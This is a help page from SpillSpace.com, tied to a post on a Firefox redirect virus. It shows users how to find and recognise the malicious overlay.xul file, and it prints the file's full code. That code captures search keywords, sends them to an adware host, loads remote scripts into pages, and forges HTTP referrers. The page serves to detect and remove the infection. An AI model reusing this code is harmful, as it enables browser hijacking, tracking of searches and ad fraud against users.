Provided by: SpillSpace.com
Return to Post: New Firefox Virus Causes Redirects to Adsites: How to fix it, how to avoid it
Right click on the file (most likely called overlay.xul), choose "open with", select either notepad or wordpad. The result may not come out as nice and neat as the code below, that is OK. Scroll past the License Block. Look for code similar to what you see below:
________________________________________________________________________________
<overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript" >
window.addEventListener("load", function() { xulRef.init(); }, false);
window.addEventListener("load", initRequestObserver, false);
var xulRef = {
init:
function(){
var appcontent = document.getElementById("appcontent");
if(appcontent){
appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);
}
},
onPageLoad:
function(aEvent){
var doc = aEvent.originalTarget;
var loc = doc.location.href;
var ref = doc.referrer;
var keyword = '';
var engine ;
var __d = "http://v1.adwarefeed.com/ffjs.php?u=2630369290-57989841-1078081533-839522115a=998&s=3&v=icv270109ff&e=";
if( loc.match(/google\..+\/search.*[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'google';
// } else if(loc.match(/search\.ua.+[&\?]q=([^&]*)/)){
// keyword = RegExp.$1;
} else if ( loc.match(/search\.yahoo.*search.*[&\?]p=([^&]*)/)){
keyword = RegExp.$1;
engine = 'yahoo';
} else if(loc.match(/altavista\.com.*results[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'altavista';
} else if(loc.match(/alltheweb\.com.*search[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'alltheweb';
} else if(loc.match(/search\.netscape\.com.*search[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'netscape';
} else if(loc.match(/search\.aol\.com.*search[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'aol';
} else if(loc.match(/ask\.com.*web[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'ask';
} else if(loc.match(/search\.com.*search[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'searchcom';
} else if(loc.match(/search\.lycos\.com.*[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'lycos';
} else if(loc.match(/nova\.rambler\.ru.*search[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'rambler';
} else if(loc.match(/gogo\.ru.*go[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'gogo';
} else if(loc.match(/meta\.ua.*search.asp[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'meta';
//} else if(loc.match(/au\.ru.*searchPhrase=([^&]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/all\.by.*search.*[&\?]query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'allby';
// } else if(loc.match(/uaport\.net.*UAcatalog[/][&\?].*query=([^&]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/search\.msn\.com.*results.*[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'msn';
} else if(loc.match(/search\.live\.com.*results.*[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'live';
};
if( keyword.length > 0 ){
var script = window.content.document.createElement('script');
script.id = "js_0";
script.src = __d + engine + '&q=' + keyword;
doc.getElementsByTagName('head')[0].appendChild(script);
}
}
};
function initRequestObserver() {
var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver(httpRequestObserver, "http-on-modify-request",
false);
}
var httpRequestObserver = {
observe:
function(subject, topic, data) {
if(topic == "http-on-modify-request") {
var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
var pos = subject.URI.spec.indexOf("&rf=http");
if(pos > -1) {
var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"]
.getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)),
null, null);
httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0,
pos);
}
}
}
};
</script>
</overlay>